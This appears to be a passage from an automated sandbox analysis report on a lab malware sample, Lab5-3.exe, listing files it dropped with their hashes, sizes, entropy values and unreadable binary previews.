                                                                                                          SSDEEP:48:4+Sbo0Ym7SwJdOAoluos6HfUTid3hBaUoSGFcmeykEdEElU92i:4+S8m0Ao0o6Gx0uKeY2ElUJ
                                                                                                          MD5:F422B1379D692E1BDC30FDE2B80F5319
                                                                                                          SHA1:95199AE1E572AB14E18715F69F98476F8ECF9661
                                                                                                          SHA-256:F59FB0942E9788ED4382A37B9F53BC882825B43776F7A989A6E946E45325E167
                                                                                                          SHA-512:D467E810567A5A22FAE4717C8027CA197F3914AF0C3C7178591F9439641EEAC1EE918F2C2A87D2941F0ED97039836F3095206A5982702E59BCB6668DD46416B8
                                                                                                          Malicious:false
                                                                                                          Preview:...m..o..m..io...c.Q.%G5.w.....G.Za....!...B.1Y.....h`..9..>Y...~_...G.....O......^]dP....-..q.i..H.8c.......P......IM.....G..L.....T.u.[....'..).K.>...>....<...n....p..X..i.w5...S.w..."..3z..\`+v.U].....-\....h..>......Y3C<A9.......l.....b..K...`.{...T)..2....e..O.@..2.\.q6.ZIn.MrC`.....=.@'.......1..w=4nF.\s.x.D.,N#...y..!NK:..lmbb;N.L.d....xj.{....Y.i.4...........X.."A.Df.j.d...S... ]......R..k......7..Bx..c...r.%.m.i.Nz....Uc...K9...#.X:...+.X9.k...c..$...i....F....#`.BQ....$.}ltf...EB~..PO...4Z.:..r.....6..m.o5.o.Bvq...O$.U.H.....m...l..o.........|..E.u.><Rp.?.O.lr..#...H8.Bz.?..T.RD.x.D.eWO.-..10..G~]vU.Q3........QU?..K~.....h.*..>.....|.g....|..i....L.....'...l.....~...E...+^...J?.^.o..I.........w.3..Z..<..t..........^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D.......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2048
                                                                                                          Entropy (8bit):7.909014283840994
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:TXS+akU2Zt9EHfUTid3hBaUoSGFcmeykEdEElU92i:TXS+rU2ZnGx0uKeY2ElUJ
                                                                                                          MD5:18910C7D228CDA3B8F4E571B875A1B15
                                                                                                          SHA1:DE4E2B4024EF53401A15C67F264A1E0A4C4ECA70
                                                                                                          SHA-256:F653F3A23ED579A092EB50FDF1DAF31C3DBC3AD954748CA14E898C788EE95D99
                                                                                                          SHA-512:9CBD311CB739439AD8D09A8AB8019CCCF3AAE86728614F872AD635371CF6571FDEBE57C38FACD5C1F5ED1371CE1ED70B896178CFD4372D08AD84F064006508C1
                                                                                                          Malicious:false
                                                                                                          Preview:.....<5.f.Y...Q.C....s|X.v.G})...bQN...!......wM.W.Nz/z+...j..t."'.p.^....a.U..~w4.o.$u..l..J&.g.I1..nQ.m...7..Yg...d..yM{./.$s%.."k.gl.......#.EF..X...].....>(|...u.n...'<.3...*.3...|.q.T.8V...Z..*[./..{...i.2.%k...+..5H1\.>.#.........N..`.i[(.!z..&.of91;3..3K...M...r...7.2.~X.s..-...=z...M../iPP..I.#...L.g.....qq....nRVy.&I..&.9..,e.oH'....lK...k......Y.Y`.j....u....RU...i.k...S. ..s. ..[<b..6.KZ.:.F_.!H:O}9....F." ...F-.r.Z......<...Aa;{.U/.DGl.....]...I[..'....%...]...&.lB..._.(.....m*.E..c..[.&t=.<M(,.M..}.Gn..r.n...Z..V...w.5./...="..Q...v........t..I.:...T.s.w...,......N...S..B..Z.*..2..Wn...R.c..g....5z...."....a.lw..X..y.U...p..p_....;..1..........^............Y,....Z..Wg"..\.....k.(...|..Z.+...*0.l7.Aa..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2000
                                                                                                          Entropy (8bit):7.909911742150076
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:MdLs5iWeENMZn4eL78HfUTid3hBaUoSGFcmeykEdEElU92i:ALUMENTknGx0uKeY2ElUJ
                                                                                                          MD5:A5AABC0015827B24634AEF66AEA25248
                                                                                                          SHA1:6BCDFBBEADFF11B9525968465E9F985121C9423A
                                                                                                          SHA-256:6E687E9D51E13CE1BB5EBE2B3404D62543F9E8C57ADFE4D9473E40A0C895DF9A
                                                                                                          SHA-512:C9D794E0B93C375AFA71AFF04A341ECFAF2A1742E649E337C02BC29A51C8F62C93F113C1883BA23A24CF79B52A3718B9034EE6D144CFA8734704B39249377233
                                                                                                          Malicious:false
                                                                                                          Preview:Yr.(..J..B...E.;y....C..."l...G.t..1m.....;...i.........y..iR.Y..~p. z.?.L.w...f.4..jG...W.6......A}-d.6..>#C.hyJ)}.~....Q.q..V..>g...V.g..8..o.Y......?:..7'....r..A.nSV=.....R....]f....{Y...]|p...CtT.H@..A.a.3.PU.....s...t.].....~.s.U.P.66.39X..a....?.]V.j.z...EK..oM._....B.....e....yU..`.../..(.X...`...F.3...k...?8.w.V....C...=O...F.D..4>......B....}..G...9....^>.~.A..uz...5....i2.i.. w...s....+.....a.......~...Pz!C.t.\@...G....&~z&.9.o.*....(..].*.....a..dL...+.+...6...&....j......\.X{l.^.....m.......2.....0..&..$y.!..C....^.?.....%M_..IS....zG$...c.u.....:.......,.@..U...]...x0._uvq..2.Z..T.0.9..lZ.S/3...g".H^.9.tP.]^T..9.J.5D..yOo.W..r.x....,..k.P..t...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2016
                                                                                                          Entropy (8bit):7.909610763765921
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:GqzFhfQI6Ut3znjA6LsHfUTid3hBaUoSGFcmeykEdEElU92i:9zHQI6UtDjA6LrGx0uKeY2ElUJ
                                                                                                          MD5:96DF42FBD192D9A8CD8E4D2020FDF39E
                                                                                                          SHA1:5C8F6830F38630C24DDBA454764C4AD4E13EE6DD
                                                                                                          SHA-256:8B6041FF37E8F35D932245F2ED669C7C4D1E74A951E5F017686444B3B4DC1715
                                                                                                          SHA-512:6747757ADF6AEE4936E1AE7CCB8CDACC1CC152F6721D763C4ED45C440F2672490BE5D25794C577E6C44BA2711CB2BC4236A9CEB9DD5E9BD6A1241D016E2563E3
                                                                                                          Malicious:false
                                                                                                          Preview:2W......Jx..??5b.FN.g....G$av...|rNE.....E&.p+......ZC.@I..9R.....2{-,.q..4I2.nL2.....W......<............(#.Q*......=.v..-<Y....$.....G.v.!x.....(..W.R.M..[.....l8Z..e6.k..A...'..B..e.4..lVporf.8w'..P.~..Uf.....v|........*.QC'.........Dr5.T.M..k....:q.!....!..CP.jfeE...TI....X,.r...9...u......]....zV..3.......s....7`x..+.<P.#.....`.....H)}.....pa.....R....i.0....m.0.x.;C..7..j.u.c.p.+.l..I#(I?..|...[.X....u..4!.....Nax[...u......&:...)(.5....._.C...S...Lk0.)..B-..mo1.[.....',....J....?..>...V.,..}.#..$...{!L...C..r..}&..;....m......c'.ZXE..8.P6.^.t@{.u.....7.........:M.j....'.d...1...$.8..ayj!ZK7.8.f/.\..s~C..0..:...?.N........w...J.....J6.....o....I+?gG...Y.6O.g..#z...T4.v.e...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2080
                                                                                                          Entropy (8bit):7.902485874640269
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:ER7kIf2pkdhIVyZkD+DQ+5OvHfUTid3hBaUoSGFcmeykEdEElU92i:anfTI8ODgQ+5O0Gx0uKeY2ElUJ
                                                                                                          MD5:C52CF4FAD1AB05FA672FA49085AFE568
                                                                                                          SHA1:8A51D4AF0BECBCE4765B65F2AD8738CB2E73F5BD
                                                                                                          SHA-256:128F6B557F51CF431FCF54C6807CD48E76F22AB17E2AEC20DCDD261C76305CE4
                                                                                                          SHA-512:5A39D7BCF71908EA107C4D54ED2B8C94500E1015E45BD9D9C01725B37C746A05AE9DCED29903A56B21291A54DE26B6BE9E8DF3A9AF71802E58F07B7AC3910C5D
                                                                                                          Malicious:false
                                                                                                          Preview:......G...\...*.Z..;.3.F.uo`..).^2a..!...*4M$.`......g.....@..A.`.M.4.`N......e./...&.....F.4)..O...cC..d. 5i...4.u..E..4?.).EsM.m$......,.-......>%.2.D..J....XA..a.7p{.:.).....>.d.....n#..O.n.*.f.[(.W...WFpZ;&l.y.Bz...EmJ#eu*..;..On..0.. .H.D|[.W.b$..........].......kjq...0f..xS..X...$.......X..,.d=.....#.@.*..........E.#(..,..z.....E.c`[Q.l.Za.Z.w.b..`....a...........m...gUZ.....{@..........NnM.(W.l..<.....b..:KQ{.?.x.cn..o.H.0.S..[:.^.<.m.l|...}}.."Hr..........:+.Hk....O.B..O..#.O.0v.AZ...}.@m....z0.d.a)....rZ...-D.d.T....u.s.......8...4.<...n..a$x..<.#.v\.c....iX..Q.......N..z.....W.......re..h..V.B.L.......U..y....R.$...].!....S".<.j..M.P..~...!L....g....=.bAG..^#...*...?Q...\[..;........*.;$. ....]]..n{2...|.e.s).Y0.h...qi..0..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D.......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2048
                                                                                                          Entropy (8bit):7.899591318263785
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:rxYog3Dg825oS5hMHfUTid3hBaUoSGFcmeykEdEElU92i:rxYo4Dm55vLGx0uKeY2ElUJ
                                                                                                          MD5:B8780CE8FCCCDD8933491DD1ADFE68A7
                                                                                                          SHA1:4A7FAD6CC55586C5140171E02892C3CC8ED0E2D4
                                                                                                          SHA-256:2B84B087F47B9460FF15AD772B2CF2111B7EE02FAB94858048AB3B80896B0123
                                                                                                          SHA-512:6CCAD0BB5BF2A9B55103BB7DC892B3D571D7E1092B6ADD918DB04580ECEA062DAD29F245203BD10CD77A7932333BC09FC347B023E35DD580DB7D31418BE23A94
                                                                                                          Malicious:false
                                                                                                          Preview:w.7......D..H.s....Q.....(5..T..%.....V......+#..a.1a..=.>5?....p%3......;l.....U"o.].j..c1V\5'...c...%..C..\[.2...i.....u.......w...$~..V-.....p..3..C..a;.....a.:e.l...........s...e&....Z..WU.$7..{U....~3|..O.....=Kg.C....D..v...w.....a..wc....\.U.=........:... ...gp./....(p....Fe.}..}.W.....]8...)[.P`..]:....v.G...pm...W'.IW...g...Wq.(.U.i/n0"...F|...h..dQ @r'........=r..{.[q..4a..b.U(.C..Y.~Hd.b-..w..m......uU.g..7...9.S...E.p*;.tw....^0....R".mG..$S..H.....CN.q..S.1p..sF.....KnE."..+.l.lH..d.....]H..VAS.6..{aJ.L.p...Ywx+N..O. ..q....(M..n.-Bn.S}.#7j.a\.....8...}...JJ.R[.../K..t.....|...T...w,.z!Z.i.`...`..[.38gP.[...5:y.G.,1h..q...`...Qv...].-/...vu?CB.>..^.C/..N`.q...d.]3Ta]............d..r...96.r....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2000
                                                                                                          Entropy (8bit):7.908449628277717
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:R3OfZEwNma/4LAfDto7HfUTid3hBaUoSGFcmeykEdEElU92i:Off4YDzGx0uKeY2ElUJ
                                                                                                          MD5:13D7FCD8F333FDF4D4CF2E956BFC2609
                                                                                                          SHA1:FC6BBE60E8FE158D996D015B3D7C0876BD5EDE1C
                                                                                                          SHA-256:D5F70727802C34D881E6C2043489450AE781544E42723D351689707432D4CAB7
                                                                                                          SHA-512:6242D547CDEB2FC94C2024132588D85CB0FAE4CF1BA97110CC0DF6C4AC2AAD38CA9F1D42698167E03EBFF26C159001EE661E01BBD9CC15397210D1A8C5C72D2A
                                                                                                          Malicious:false
                                                                                                          Preview:(..7.$..;@P....%.%.y..e..s.&.I.6.....<.4.......F..r?.'...TEi.PP.-{..>..Yi./~.5..Q$._=...l.....5[-~..L..v.a..u.....J.oTO....4......Ta$......+._..Yr........hVP.P.{Yn...>.0w... d8.....!...AqO..........o......)j....E.;...N..c.Kn...o.4._}.Eo..k.v.....|.I@...].H..)K....._.z*|...(...\....:..?.....#..=...j......r.[.....1$RQ.9./.I.{o4.x.......I.j.3...6l2..l..D....o...R+M......;..2.>.I.K.T.."...F.....G.....L....]{2 ....X.cR'..gK[R..N$?..0.*)^.x\4...._..B.`O.....!.....D;..='7...}.n...%O.oV...Kb...x[..2.g`b|..v....P..!.48.=...Z|......3Rr.r...].`.{>@.6`f~..IR.N.7e(6..z..'H.....c...B..yD....2L...*.0.......P.}=Cv..bs.B}...I...1qe....= ..}.......nU.T...#..!.!.6.X......e..W.....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2672
                                                                                                          Entropy (8bit):7.930009562828736
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:FIQCisLkg81zgk110EgOZfjHfUTid3hBaUoSGFcmeykEdEElU92i:GZVLJgzfiWwGx0uKeY2ElUJ
                                                                                                          MD5:6769DC846148449ABB9A23B231886288
                                                                                                          SHA1:C7D31194480AC5C605AFF49798341F7298C67A1B
                                                                                                          SHA-256:F2D0DA91DF0A1605D9FFF38548FAB371A821CE4CD289271711E751DCFAF25CD1
                                                                                                          SHA-512:96260341981839DE509A143309A0AE8300CA530744D68D9C65F025FCA82A1CF474B92A755B76452FD8F72278AB9D0F2159B1F52E9CB8480ECAAFBA1DBE334784
                                                                                                          Malicious:false
                                                                                                          Preview:.&.F...z.#.?.f.l...A.g.7.!....'^..!T.#.Q.5...!...A..=v......a.s..6.....[..\<..y...W.6.A.k...._....a.....* ..Hn....m......Q.L2.d4....g!.!.U.../.U..(..........z......8.Im...*X...H.5F....j.eV..:..Y.k..@&`."6..4Nm...QI.1.1....@...6.b..a.!....iE..J.K.\...._..'.j....JR.......6......EKs...k.9&+f.$p&...../_.01.-..0.......<....b..........m..s.q..\.]h....1.......B-.qFM.K....@.[.y~|N..jJ.ZT......yT~.K..8-./.u........X..e...:sd.....K.\....Xx......1.J.M.d..,X.@....vL..]....>..x~oA....\0.p}...i.Ij..r6I5.a4...nV-#Z. ...nv.s.G)........1.y..ST..[p1.(...T...9NV)......v...1..S%R5K..7W..v...........oph.|`...~.....EE....r./.U.;.i..S.o..1c....r.n@S.m.*i.;&......T.....G....."...1.se..=.G%...J.../......Q..}.3..;@3.).!?<k..~=.............=..1.|..H.';.....8.<2.j..I.1.fdS.......1c...t.c"t....X6..P.iI..D..^..H%.....u....$.M]...B...s...E.....b.....u...........D.+.R...0B......Z..[..\..0]..p..6%ZiH=2..'i..r.7....p..|..?W.%.a......o.@.q.j....XF...R.K.3.0G..[
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2672
                                                                                                          Entropy (8bit):7.927986376583428
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:qbsth/DzIgZA87oWcHUemjCvXvqHr7yhsLHfUTid3hBaUoSGFcmeykEdEElU92i:thMg990UrOqPy2YGx0uKeY2ElUJ
                                                                                                          MD5:15530659779807E0EF975532E0F9E9DB
                                                                                                          SHA1:1501CA0700B55DA5CBEBFE4EBFFD0E465349CFD0
                                                                                                          SHA-256:A47D6059AC44CED4212C6847728BAD5B1DE8C393907EA78BD3540CB6CA1443D6
                                                                                                          SHA-512:FC5C2BCB3D19650E45DD916F7F2C234133B19D0EC99B46271CCEA2ADA136E5998634FC95F71F42F7ACB5A8F73D5B386F1B4E39D7EA8D931513F9BA0692008B1B
                                                                                                          Malicious:false
                                                                                                          Preview:?`d..~.B.y.QX..M.*...:b.-i#8........pq.o.,cf.t+G[.:`H...C..`[ ;.:....'..)MkrUF.{.AbA{a........$I|....w)$.....i3..*.$....F.....[g.....%H...../._......r.>....J(.M./..>..jd....0..C<.:xr.Dz.. #.~.L.?..!.gxv..._B.uKXC.3K`xId...~.J).............Tb.2F....LIl}.*.hs....T..L.[.D.u......g.-....<...Z.]r....Df".kk.}..v...0\.*Sx.<<r..Lh<.a.=.........9^w.....A...'..v......8@...*...y.._C.$z....C..a..."..(........cv.B\.{3_.!-....,.PAqQK.v.\c.)..#......?...q.ny\....1W.6...t|.....u..1B..`/.I.rG.t.....S.[.Y........O>.E\.....5m......Z..P...]....>O..w.....M..m:.._L.l./..R.!.f......^ \.N.Yc.t...l..V...D.l.8.O+...h..[y.h.w. b."..G..".b../)..^4...Nm.?B.}8#.9..,..............pW6X.../&.Q.(G/.._.)2J... ..I..ar]C..J.. .Ig.N.{.e.:|.G. u.e..F....L..=.-.e.m..o..HT;e.....1n.......FM..?.Q[e5.G.<..:.........>...U.E_.....W'.0.W...W.u...k;*...oIlLc...U$.V...k#....j.zv5..h.X..o.hQUg....l...Af.._d.....j.T....H..........D.|..+....F.".l..^&..p;r#.......1.\pm...?...r7]...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3584
                                                                                                          Entropy (8bit):7.944283262235761
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:9sT0geyprV4pBLqfmPHLA2tnGx0uKeY2ElUJ:9sT1eyphoBLlrAi00Cb
                                                                                                          MD5:8C456493BE9FC7DFB71B17E7A56A7513
                                                                                                          SHA1:EA24FD134EA69B61894D9A6D358587010A7C3EC8
                                                                                                          SHA-256:B08A86085A9694E1F66224862A99C41C1E1A2802A426B59CF3D9D60058576E5E
                                                                                                          SHA-512:209DB0A7D30C9F3AA85E023194669D87C9434C7632E496AA42861D69D1342D9A49222BF4C88E52CB1E5BC0668381E02D01ABF3375E913152314C2AD9777FAD2F
                                                                                                          Malicious:false
                                                                                                          Preview:.{'<!.L`Mm............\.}.j......=.MI7."......S..E..B7...^....d...]...5.?+...W.J..j. [.P.&.GUOiB...a........<....Yr...-...L...N.]..."o.;...G./.....2+/.q..l?/..bKu)..........3y..$........gE..Yp.8......s[M....3..e...}...rc.......Dy.qb./\......6+.......c.....J..e0W...4...7....k8.._...:.B.(......}..D}P*....Wc.C~T...4...".M..J..s.Y.........1..+.*V..^./p...7...Er..w!...?kN%.c.j.....h.../...."fE..b32..;.....&.A.,.U&......].)T'...+{.i.>....Ihh.$....E.........L...>(l...v.;2G."...Z.l.*.."...#&.,.|.&.j.z..j.mI..)g.^..y.....5s...e.j....X....?..:..h'..P<............B.b}.d.........6r.g.."2...W....#.K1......aU.B.I..q....py..q..1.t....1l..o.._..I0.Kq*.B.$.$r:..I*......../]..m......H...Wn.p.P.2.+7..a[.5K6TF.f..F\..r@.}..n..=.......m...D.......&M.h..5......e[...wa.}.Q..V..p.mB.-t.z\..S..r8u]"z...R..#y..2.e.m.(.+%$+.._]....=.....>.6]...]h.UR9..r.. ......1......q.U..%.EkA.../....N.N!.$.X..!|5..x..X......#Kd.....i",x)u.A`..s<./B)..=i.[.\:.y3ze[.....t...b^.y.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2528
                                                                                                          Entropy (8bit):7.9277843429821475
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:RNjWfNJM6qFON/IdmsrhSmuTHfUTid3hBaUoSGFcmeykEdEElU92i:TjyNJtqY2FxfGx0uKeY2ElUJ
                                                                                                          MD5:CF69EE957330DECEA389A334A1707FD0
                                                                                                          SHA1:80D98A42E108EB838E19FBE89001D49863E457C4
                                                                                                          SHA-256:0FF2BD1BE13D35B28109573BE5BB43A1A4C93055CBE56A4402B30C731436551E
                                                                                                          SHA-512:7117EFDFB95DAC896F8CE1B71756754B715A4E496844B4FFA3DB69B632B34F170B6CB730F0206C26A30125AB53A9B64E96D631AC2F5BF7740ACAAA5862764A45
                                                                                                          Malicious:false
                                                                                                          Preview:Y>.}..^.[.E$......m"O.O..F..F.G.R$.......5.....d.?\...j....G...s..-.....@.`..Q....k.z.T.6..}s...6I........\(..RM...|z.)m.....2..kd....{...4.z.wf.Q ,Q......r.:']...s..L^zQP~k.<0O...D.C...PS.>..J.p...6.T.....C.!Z......\=]@.}.G....C..)*.v.A4MO.1.C%;xI.k.....^0WIev.......j..{X0S..?.q...f.J.9...l.....g[..!.-..q:.u..B..$1..KO.Y)..H...W.~n;.G..&.E{.g.....c...(5..e..#..L.{%..X..S.[....7..<wJ)I.....49..t~.k....}..u`-......m.V.x..xbI..)...R.OT,/(..8...^.;}....o'.R ..A./...d...Z......,{T..H..v.r...".*.......d...c..+LA.=?..9...sY%5..w.F.;..~b.....]. ...Z...A...PU....>..'Z..brU..0[$2..W4M=......H..T.........&.....QR.........*X......d.....~|!..}Q.D.s8B.w.<._L'o1.Y.........u.....K*.../..a.L.#.).....O...K....'c...X.....["U@...x..?.|......c.Hx.sV...M0.r...V.F.._.a......U.lbf.x.LOa..GY(.Ke.Z)......].fr.G{..e..vd..f.1..-.9;......#':.c.C.i.".-..SK.8.X....f...F~....#`..Q....+.g.FnQ9.2.h..N......8Q.{S..d...Z-....0..A;...m.n..!,...5...2h.f3..6...9.@$.NgMW./
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3264
                                                                                                          Entropy (8bit):7.946737147869834
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:A6qbBYZyNGP95gSRKPpqCd7kuqgqKpyv92KHfUTid3hBaUoSGFcmeykEdEElU92i:A8ZDl5XKhqCSubHFlGx0uKeY2ElUJ
                                                                                                          MD5:31D06B2434B44693D9C0A5FE5A6A6AAC
                                                                                                          SHA1:D48F06DAFDB243A1ECE459D510503DB1F1CD173A
                                                                                                          SHA-256:459EE36EBC9D27805BE7C875F56887543E2EC7FB689335E468B5B92DAD7D9468
                                                                                                          SHA-512:A5DAD9036DA899D917D4E45204CAA04FDC6EF0DE9698EABBA2935C7F87DDE4BFB06E554B2A80E02BBCAEC92790DCFA7D9444763A140BFFE72445CC722547EFF9
                                                                                                          Malicious:false
                                                                                                          Preview:_D@~..UoZ.e'..}...H3..8...xYJ.C.7....@tl./1.i....9~......~A....p.Z..,H^.'.[..J........x.K...COR...UJ. .mf....:...t...v.ir9......ng4..|..ExJJS.+.MwP..._7...%.....Es..B..c......GK.p.7....c....j...1<.".8g...vs.k..R.ihC...+...D3....q..sJS..ga.l....y.{..;iTT/......f..._...j4.r..7YF{'.4.}..j5.WTe'L......H\.\.t.h...{...%?.....bP...(...i...P..r...5\......c..Y....Z(..=.+..o..x8....K.^....hZ..........S..&E..O..(.+r`n..{.-K.%|y(%.%.x.....&.Jd...'?.]....|.#..ol-.;....2 .R.....D.!...Y...X.c.e......:.N:o..zk.X.....z..r....~.E.....DP .\...<.=...?@.ki..^A..........U.[g'..|I..%..U..Wo..&.mI.o.......-.#.....5...{"..=P...A.C..:8..._m%h.HT.....m...j..ge_.n\.am...$#........X.s.S^k.j.[l..&W......+.T.......D...."nG.r.Y....?. .....D".IUm.........l..."h..e.x.....b..!..._b2.T.m..u.:.........9.|..8....1..Lg......G....^..v..H`j.!....,`b./.?.K.S;0$....LP..9"$....r1.....n.vnw...lw....,{1....."....x.e.....!T/...d....Z.\..R.o. .g.:..../f..R.B.x..3..!....*R.....x
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9408
                                                                                                          Entropy (8bit):7.979704952806612
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:V7nNgI4xsdJASo7RfdB5oXlE3xlFz2337Y7R1Zmio0Cb:PgYrA759xl6UN1Gtb
                                                                                                          MD5:CD1E7AFDEEC055482CA021BC9F601B83
                                                                                                          SHA1:39EA87E16E181766B4D01FC52A2FD8BDC221528E
                                                                                                          SHA-256:55B088F5765DEB67C4C9EACC1001A65949495D99EADB0C6D805D6AFC406D1E6F
                                                                                                          SHA-512:2D4BE09BF0927EC04808F62FF1844D46DE76CC3D62EFA4C45A9CB8B03BA21ACAFFCBC2D0370C9171E49896B8ED5E2C3AF038379D0317732734BB5D520423DF27
                                                                                                          Malicious:false
                                                                                                          Preview:............'W.(M'w.|..u...+./.o...../6.$v....'...Ip..p0...]..6...`..R...J.....w...tO8...Q..........x\.x.h......nk.C.?...;].`..._........Ee....!...8n....rv %.7$"...h.......i..m..A..2..r.....+..s..S^..........5..y...4GDm..L.q_.(w}o.Eq..mr....l...W/.+..h_&9.A.td.]?#...f.......C...z.Up.G[.+...i. F..W=u.j{.W8.!..d.._Y...l.,5#F...Xm....WO....BT.....#.U. ..P....{e..D6.....K.q.hm...4..b.i.%".F...P..&...K.K.[...$.v..8....Z..rz..;x.,x.r2*A..6.XJ.~....@&.9w&...e3HyR[.<=2......~.9$.aV.R.8.......\<Q..H@.....yQt.......%...8i..L..-t..PY..Y#.Z.....T..*..}...5...*...k..E\sMX.ks9..zF.v..3.."..We.G.....W.....B9.wk.b$.e.d]..H@;..d$32.?.7.j.*.m&$}.z..8K.......#f76.>,..dG..Pz..`,.H&W&....4.28...MD..F..S...9+P.....o...M.......z..9...~../.W.}.}(...2cS~...X.Y./.Y..c!..... ,......-.B...1M'..:K.<;.....{.5!..m.'p....VL.!...hb......1..!.&gp.Uj{.8..K6?..Y.[..$..Q#H..s.@....%Q..4...%.=....r.l.....s..Jl..o...c.s.&.h/X.....P..;.a.gi..w._e>.....8}&.L......VEi......o
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2576
                                                                                                          Entropy (8bit):7.928501158260257
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:8wVgWgGbqZ+J935LuGMTx/8VHfUTid3hBaUoSGFcmeykEdEElU92i:8t1Zg9pL0Gx0uKeY2ElUJ
                                                                                                          MD5:958CDFB1113F7E24BCC99286586E559C
                                                                                                          SHA1:14EAFB8E7C855378B64AAA4D14C4E31288743015
                                                                                                          SHA-256:78B4CDF1E18E06D5B678E0A2FD329195C062A548797EA432C3EE34817C53C198
                                                                                                          SHA-512:BBE35B6ED7C0F5308594262EB98235BC28FE056C1B1CC1A34A5848983FAA46FFE92199A1CCD1C85B9DD6BBB480108F97E75EAB07543A21E8C3BB7B4E8F747816
                                                                                                          Malicious:false
